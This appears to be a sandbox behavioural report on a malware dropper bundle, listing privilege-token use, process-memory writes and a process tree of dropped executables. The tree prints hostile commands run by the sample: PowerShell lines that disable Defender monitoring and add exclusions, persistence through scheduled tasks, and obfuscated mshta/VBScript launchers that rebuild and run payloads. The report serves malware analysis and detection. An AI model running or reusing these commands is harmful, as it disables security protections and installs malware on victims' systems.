Token: SeSystemEnvironmentPrivilege	4092	Thu180670b7bfc47.exe
Token: SeChangeNotifyPrivilege	4092	Thu180670b7bfc47.exe
Token: SeRemoteShutdownPrivilege	4092	Thu180670b7bfc47.exe
Token: SeUndockPrivilege	4092	Thu180670b7bfc47.exe
Token: SeSyncAgentPrivilege	4092	Thu180670b7bfc47.exe
Token: SeEnableDelegationPrivilege	4092	Thu180670b7bfc47.exe
Token: SeManageVolumePrivilege	4092	Thu180670b7bfc47.exe
Token: SeImpersonatePrivilege	4092	Thu180670b7bfc47.exe
Token: SeCreateGlobalPrivilege	4092	Thu180670b7bfc47.exe
Token: 31	4092	Thu180670b7bfc47.exe
Token: 32	4092	Thu180670b7bfc47.exe
Token: 33	4092	Thu180670b7bfc47.exe
Token: 34	4092	Thu180670b7bfc47.exe
Token: 35	4092	Thu180670b7bfc47.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	3472	Thu18e397420e63c.exe
Token: SeDebugPrivilege	3052	Thu18a708c1b35ca7.exe
Token: SeRestorePrivilege	1556	WerFault.exe
Token: SeBackupPrivilege	1556	WerFault.exe
Token: SeBackupPrivilege	1556	WerFault.exe
Token: SeDebugPrivilege	5452	taskkill.exe
Token: SeDebugPrivilege	5736	mHay6_8dEOokHG0nEKL5XFNh.exe
Token: SeDebugPrivilege	1340	6g155AgwE1phmzSP_PBZ1bUu.exe
Token: SeDebugPrivilege	5684	BCleanSoft82.exe
Token: SeCreateTokenPrivilege	3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe
Token: SeAssignPrimaryTokenPrivilege	3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe
Token: SeLockMemoryPrivilege	3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe
Token: SeIncreaseQuotaPrivilege	3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe
Token: SeMachineAccountPrivilege	3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe
Token: SeTcbPrivilege	3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe
Token: SeSecurityPrivilege	3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe
Token: SeTakeOwnershipPrivilege	3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe
Token: SeLoadDriverPrivilege	3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe
Token: SeSystemProfilePrivilege	3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe
Token: SeSystemtimePrivilege	3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe
Token: SeProfSingleProcessPrivilege	3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe
Token: SeIncBasePriorityPrivilege	3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe
Token: SeCreatePagefilePrivilege	3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe
Token: SeCreatePermanentPrivilege	3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe
Token: SeBackupPrivilege	3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe
Token: SeRestorePrivilege	3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe
Token: SeShutdownPrivilege	3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe
Token: SeDebugPrivilege	3416	PxUlXBJmw5AeBLIVy2Hr1GbW.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

Thu18bc30a51e137d0.tmp

pid process

3412 Thu18bc30a51e137d0.tmp

pid	process
3412	Thu18bc30a51e137d0.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.exeThu18bc30a51e137d0.exe

description	pid	process	target process
PID 3788 wrote to memory of 1772	3788	setup_x86_x64_install.exe	setup_installer.exe
PID 3788 wrote to memory of 1772	3788	setup_x86_x64_install.exe	setup_installer.exe
PID 3788 wrote to memory of 1772	3788	setup_x86_x64_install.exe	setup_installer.exe
PID 1772 wrote to memory of 1380	1772	setup_installer.exe	setup_install.exe
PID 1772 wrote to memory of 1380	1772	setup_installer.exe	setup_install.exe
PID 1772 wrote to memory of 1380	1772	setup_installer.exe	setup_install.exe
PID 1380 wrote to memory of 1544	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 1544	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 1544	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 2976	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 2976	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 2976	1380	setup_install.exe	cmd.exe
PID 2976 wrote to memory of 2100	2976	cmd.exe	powershell.exe
PID 2976 wrote to memory of 2100	2976	cmd.exe	powershell.exe
PID 2976 wrote to memory of 2100	2976	cmd.exe	powershell.exe
PID 1544 wrote to memory of 1996	1544	cmd.exe	powershell.exe
PID 1544 wrote to memory of 1996	1544	cmd.exe	powershell.exe
PID 1544 wrote to memory of 1996	1544	cmd.exe	powershell.exe
PID 1380 wrote to memory of 2004	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 2004	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 2004	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 1788	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 1788	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 1788	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 2208	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 2208	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 2208	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 2156	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 2156	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 2156	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 3384	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 3384	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 3384	1380	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 3168	2208	cmd.exe	Thu18bc30a51e137d0.exe
PID 2208 wrote to memory of 3168	2208	cmd.exe	Thu18bc30a51e137d0.exe
PID 2208 wrote to memory of 3168	2208	cmd.exe	Thu18bc30a51e137d0.exe
PID 1380 wrote to memory of 3164	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 3164	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 3164	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 2800	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 2800	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 2800	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 1208	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 1208	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 1208	1380	setup_install.exe	cmd.exe
PID 1788 wrote to memory of 3436	1788	cmd.exe	Thu185371386aa533.exe
PID 1788 wrote to memory of 3436	1788	cmd.exe	Thu185371386aa533.exe
PID 1380 wrote to memory of 3644	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 3644	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 3644	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 3420	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 3420	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 3420	1380	setup_install.exe	cmd.exe
PID 2004 wrote to memory of 3720	2004	cmd.exe	Thu18b818b5afea12f2.exe
PID 2004 wrote to memory of 3720	2004	cmd.exe	Thu18b818b5afea12f2.exe
PID 2004 wrote to memory of 3720	2004	cmd.exe	Thu18b818b5afea12f2.exe
PID 1380 wrote to memory of 5028	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 5028	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 5028	1380	setup_install.exe	cmd.exe
PID 3168 wrote to memory of 5108	3168	Thu18bc30a51e137d0.exe	Thu18bc30a51e137d0.tmp
PID 3168 wrote to memory of 5108	3168	Thu18bc30a51e137d0.exe	Thu18bc30a51e137d0.tmp
PID 3168 wrote to memory of 5108	3168	Thu18bc30a51e137d0.exe	Thu18bc30a51e137d0.tmp
PID 1380 wrote to memory of 2028	1380	setup_install.exe	cmd.exe
PID 1380 wrote to memory of 2028	1380	setup_install.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3788

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1772

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
4⤵
- Suspicious use of WriteProcessMemory
PID:1544

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious use of WriteProcessMemory
PID:2976

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu18b818b5afea12f2.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2004

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu18b818b5afea12f2.exe
Thu18b818b5afea12f2.exe
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3720

C:\Users\Admin\Pictures\Adobe Films\5P1GWzowbdxGzxPb5GNtTRrD.exe
"C:\Users\Admin\Pictures\Adobe Films\5P1GWzowbdxGzxPb5GNtTRrD.exe"
6⤵
- Executes dropped EXE
PID:5376

C:\Users\Admin\Pictures\Adobe Films\oXRgQ0K7w4sahYclmQpPRlRo.exe
"C:\Users\Admin\Pictures\Adobe Films\oXRgQ0K7w4sahYclmQpPRlRo.exe"
6⤵
PID:3788

C:\Program Files (x86)\Company\NewProduct\cutm3.exe
"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
7⤵
PID:3116

C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
7⤵
- Executes dropped EXE
PID:1540

C:\Users\Admin\Pictures\Adobe Films\ejs6iDeyGif8RvVGthhC5xbB.exe
"C:\Users\Admin\Pictures\Adobe Films\ejs6iDeyGif8RvVGthhC5xbB.exe"
6⤵
- Executes dropped EXE
PID:408

C:\Users\Admin\Pictures\Adobe Films\VARgFvFywJuQwzrhvgVFxyC3.exe
"C:\Users\Admin\Pictures\Adobe Films\VARgFvFywJuQwzrhvgVFxyC3.exe"
6⤵
- Executes dropped EXE
PID:4000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 292
7⤵
- Program crash
PID:3384

C:\Users\Admin\Pictures\Adobe Films\c1oaTvAcLhJPswj4Gu0dR0kb.exe
"C:\Users\Admin\Pictures\Adobe Films\c1oaTvAcLhJPswj4Gu0dR0kb.exe"
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2996

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Creates scheduled task(s)
PID:3300

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:5392

C:\Users\Admin\Documents\broxaYP2d8gTe5znkNR3EzPi.exe
"C:\Users\Admin\Documents\broxaYP2d8gTe5znkNR3EzPi.exe"
7⤵
PID:7136

C:\Users\Admin\Pictures\Adobe Films\7TR8kNrtzqD6RovHEHTePKKo.exe
"C:\Users\Admin\Pictures\Adobe Films\7TR8kNrtzqD6RovHEHTePKKo.exe"
8⤵
PID:6936

C:\Users\Admin\Pictures\Adobe Films\VaDoDmACYW2fnMxDcTLYPWtu.exe
"C:\Users\Admin\Pictures\Adobe Films\VaDoDmACYW2fnMxDcTLYPWtu.exe"
8⤵
PID:6440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6440 -s 232
9⤵
- Program crash
PID:3164

C:\Users\Admin\Pictures\Adobe Films\W8tPI1jbG5SDu5qt5985bQIZ.exe
"C:\Users\Admin\Pictures\Adobe Films\W8tPI1jbG5SDu5qt5985bQIZ.exe"
8⤵
PID:4608

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\W8tPI1jbG5SDu5qt5985bQIZ.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\W8tPI1jbG5SDu5qt5985bQIZ.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
9⤵
PID:1552

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\W8tPI1jbG5SDu5qt5985bQIZ.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\W8tPI1jbG5SDu5qt5985bQIZ.exe" ) do taskkill -f -iM "%~NxM"
10⤵
PID:3572

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "W8tPI1jbG5SDu5qt5985bQIZ.exe"
11⤵
- Kills process with taskkill
PID:5268

C:\Users\Admin\Pictures\Adobe Films\3teaQeLOoZgQc3ObBsN18tTX.exe
"C:\Users\Admin\Pictures\Adobe Films\3teaQeLOoZgQc3ObBsN18tTX.exe"
8⤵
PID:2028

C:\Users\Admin\Pictures\Adobe Films\3teaQeLOoZgQc3ObBsN18tTX.exe
"C:\Users\Admin\Pictures\Adobe Films\3teaQeLOoZgQc3ObBsN18tTX.exe" -u
9⤵
PID:1180

C:\Users\Admin\Pictures\Adobe Films\GKY_sa3vZwUIHXnFnRlh6RNU.exe
"C:\Users\Admin\Pictures\Adobe Films\GKY_sa3vZwUIHXnFnRlh6RNU.exe"
8⤵
PID:5032

C:\Users\Admin\Pictures\Adobe Films\iDNI79SuejCbNtS_MZsDxfl5.exe
"C:\Users\Admin\Pictures\Adobe Films\iDNI79SuejCbNtS_MZsDxfl5.exe"
8⤵
PID:5020

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
9⤵
PID:912

C:\Users\Admin\Pictures\Adobe Films\7pDgmpfVOIHkJRIOkOaBn2_j.exe
"C:\Users\Admin\Pictures\Adobe Films\7pDgmpfVOIHkJRIOkOaBn2_j.exe"
8⤵
PID:968

C:\Users\Admin\AppData\Local\Temp\is-6JR8C.tmp\7pDgmpfVOIHkJRIOkOaBn2_j.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6JR8C.tmp\7pDgmpfVOIHkJRIOkOaBn2_j.tmp" /SL5="$302B0,506127,422400,C:\Users\Admin\Pictures\Adobe Films\7pDgmpfVOIHkJRIOkOaBn2_j.exe"
9⤵
PID:5444

C:\Users\Admin\AppData\Local\Temp\is-C6LQ0.tmp\DYbALA.exe
"C:\Users\Admin\AppData\Local\Temp\is-C6LQ0.tmp\DYbALA.exe" /S /UID=2709
10⤵
PID:6860

C:\Users\Admin\AppData\Local\Temp\66-09d2f-462-03291-0b5fa21dcbeee\Baesydogole.exe
"C:\Users\Admin\AppData\Local\Temp\66-09d2f-462-03291-0b5fa21dcbeee\Baesydogole.exe"
11⤵
PID:2536

C:\Users\Admin\Pictures\Adobe Films\GvsCaBlFX5qgguguBiyMCp9X.exe
"C:\Users\Admin\Pictures\Adobe Films\GvsCaBlFX5qgguguBiyMCp9X.exe"
6⤵
PID:5440

C:\Users\Admin\Pictures\Adobe Films\6g155AgwE1phmzSP_PBZ1bUu.exe
"C:\Users\Admin\Pictures\Adobe Films\6g155AgwE1phmzSP_PBZ1bUu.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1340

C:\Users\Admin\Pictures\Adobe Films\ACrRRCy_PVvlLRvop9iB4H3C.exe
"C:\Users\Admin\Pictures\Adobe Films\ACrRRCy_PVvlLRvop9iB4H3C.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4512

C:\Users\Admin\Pictures\Adobe Films\mHay6_8dEOokHG0nEKL5XFNh.exe
"C:\Users\Admin\Pictures\Adobe Films\mHay6_8dEOokHG0nEKL5XFNh.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5736

C:\Users\Admin\Pictures\Adobe Films\1fIWg3FE_6WeASiOX_SUyRrH.exe
"C:\Users\Admin\Pictures\Adobe Films\1fIWg3FE_6WeASiOX_SUyRrH.exe"
6⤵
- Executes dropped EXE
PID:5728

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5728 -s 304
7⤵
- Program crash
PID:2472

C:\Users\Admin\Pictures\Adobe Films\sa0QBYfOxxhllGzc7DKunaCi.exe
"C:\Users\Admin\Pictures\Adobe Films\sa0QBYfOxxhllGzc7DKunaCi.exe"
6⤵
PID:3124

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:3788

C:\Users\Admin\AppData\Local\Temp\Comicography.exe
"C:\Users\Admin\AppData\Local\Temp\Comicography.exe"
8⤵
PID:7000

C:\Users\Admin\Pictures\Adobe Films\1SLstj9ScczTIceTxvhx8luB.exe
"C:\Users\Admin\Pictures\Adobe Films\1SLstj9ScczTIceTxvhx8luB.exe"
6⤵
- Executes dropped EXE
PID:5724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5724 -s 296
7⤵
- Program crash
PID:3200

C:\Users\Admin\Pictures\Adobe Films\Ad9sMunB7HgTcrhw_BIBEgDd.exe
"C:\Users\Admin\Pictures\Adobe Films\Ad9sMunB7HgTcrhw_BIBEgDd.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:5288

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:5896

C:\Users\Admin\Pictures\Adobe Films\Q10UKn8KMDXewY_XUSlOELbp.exe
"C:\Users\Admin\Pictures\Adobe Films\Q10UKn8KMDXewY_XUSlOELbp.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5712

C:\Users\Admin\Pictures\Adobe Films\720WMATpgfGyyfaE9ahTIhZe.exe
"C:\Users\Admin\Pictures\Adobe Films\720WMATpgfGyyfaE9ahTIhZe.exe"
6⤵
- Executes dropped EXE
PID:412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 300
7⤵
- Program crash
PID:6108

C:\Users\Admin\Pictures\Adobe Films\GvBN6zK33n6LSJ_Am0RL73Hx.exe
"C:\Users\Admin\Pictures\Adobe Films\GvBN6zK33n6LSJ_Am0RL73Hx.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:964

C:\Users\Admin\Pictures\Adobe Films\nDCHVODmwBWHh3NVLA1Bq0Nt.exe
"C:\Users\Admin\Pictures\Adobe Films\nDCHVODmwBWHh3NVLA1Bq0Nt.exe"
6⤵
- Executes dropped EXE
PID:5084

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\nDCHVODmwBWHh3NVLA1Bq0Nt.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\nDCHVODmwBWHh3NVLA1Bq0Nt.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
7⤵
PID:1868

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\nDCHVODmwBWHh3NVLA1Bq0Nt.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\nDCHVODmwBWHh3NVLA1Bq0Nt.exe" ) do taskkill -im "%~NxK" -F
8⤵
PID:5232

C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
9⤵
PID:2844

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
10⤵
PID:4784

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
11⤵
PID:2452

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )
10⤵
PID:5652

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
11⤵
PID:6596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
12⤵
PID:500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
12⤵
PID:6816

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -y .\N3V4H8H.SXY
12⤵
PID:5912

C:\Windows\SysWOW64\taskkill.exe
taskkill -im "nDCHVODmwBWHh3NVLA1Bq0Nt.exe" -F
9⤵
- Kills process with taskkill
PID:5108

C:\Users\Admin\Pictures\Adobe Films\CH5sTuSjfVgsSOChurOcYPQ7.exe
"C:\Users\Admin\Pictures\Adobe Films\CH5sTuSjfVgsSOChurOcYPQ7.exe"
6⤵
PID:3256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3256 -s 300
7⤵
- Program crash
PID:6236

C:\Users\Admin\Pictures\Adobe Films\RVlyLya_hhDwFuthcHwjl9aN.exe
"C:\Users\Admin\Pictures\Adobe Films\RVlyLya_hhDwFuthcHwjl9aN.exe"
6⤵
- Executes dropped EXE
PID:1812

C:\Users\Admin\AppData\Roaming\Underdress.exe
C:\Users\Admin\AppData\Roaming\Underdress.exe
7⤵
PID:1448

C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe
"C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"
8⤵
PID:6756

C:\Users\Admin\AppData\Roaming\proliv041.exe
C:\Users\Admin\AppData\Roaming\proliv041.exe
7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:664

C:\Users\Admin\Pictures\Adobe Films\c0QvszGxw8kIaCyd6yxTscOL.exe
"C:\Users\Admin\Pictures\Adobe Films\c0QvszGxw8kIaCyd6yxTscOL.exe"
6⤵
PID:5940

C:\Users\Admin\Pictures\Adobe Films\c0QvszGxw8kIaCyd6yxTscOL.exe
"C:\Users\Admin\Pictures\Adobe Films\c0QvszGxw8kIaCyd6yxTscOL.exe"
7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4052

C:\Users\Admin\Pictures\Adobe Films\Qpj8Yk78ma5O1_5fRpblI_Cq.exe
"C:\Users\Admin\Pictures\Adobe Films\Qpj8Yk78ma5O1_5fRpblI_Cq.exe"
6⤵
- Executes dropped EXE
PID:5264

C:\Users\Admin\Pictures\Adobe Films\sKQPtMAl2c4p1aVoKRTiIeFm.exe
"C:\Users\Admin\Pictures\Adobe Films\sKQPtMAl2c4p1aVoKRTiIeFm.exe"
6⤵
- Executes dropped EXE
PID:5748

C:\Users\Admin\Pictures\Adobe Films\sKQPtMAl2c4p1aVoKRTiIeFm.exe
"C:\Users\Admin\Pictures\Adobe Films\sKQPtMAl2c4p1aVoKRTiIeFm.exe"
7⤵
PID:6880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5748 -s 1944
7⤵
- Program crash
PID:1760

C:\Users\Admin\Pictures\Adobe Films\PxUlXBJmw5AeBLIVy2Hr1GbW.exe
"C:\Users\Admin\Pictures\Adobe Films\PxUlXBJmw5AeBLIVy2Hr1GbW.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3416

C:\Users\Admin\Pictures\Adobe Films\QnlljkyKHLtHJ4T8OxJKUSTi.exe
"C:\Users\Admin\Pictures\Adobe Films\QnlljkyKHLtHJ4T8OxJKUSTi.exe"
6⤵
- Loads dropped DLL
PID:5148

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
7⤵
PID:4628

C:\Users\Admin\Pictures\Adobe Films\Osj3PP63xj9liklVKja1b1jJ.exe
"C:\Users\Admin\Pictures\Adobe Films\Osj3PP63xj9liklVKja1b1jJ.exe"
6⤵
PID:6428

C:\Users\Admin\AppData\Local\Temp\is-2B14H.tmp\Osj3PP63xj9liklVKja1b1jJ.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2B14H.tmp\Osj3PP63xj9liklVKja1b1jJ.tmp" /SL5="$601AA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Osj3PP63xj9liklVKja1b1jJ.exe"
7⤵
PID:7008

C:\Users\Admin\AppData\Local\Temp\is-MKHQE.tmp\DYbALA.exe
"C:\Users\Admin\AppData\Local\Temp\is-MKHQE.tmp\DYbALA.exe" /S /UID=2710
8⤵
PID:6952

C:\Users\Admin\AppData\Local\Temp\44-6c9ea-7e3-66590-873a7fad5a42f\Fizhelezhaemo.exe
"C:\Users\Admin\AppData\Local\Temp\44-6c9ea-7e3-66590-873a7fad5a42f\Fizhelezhaemo.exe"
9⤵
PID:1936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
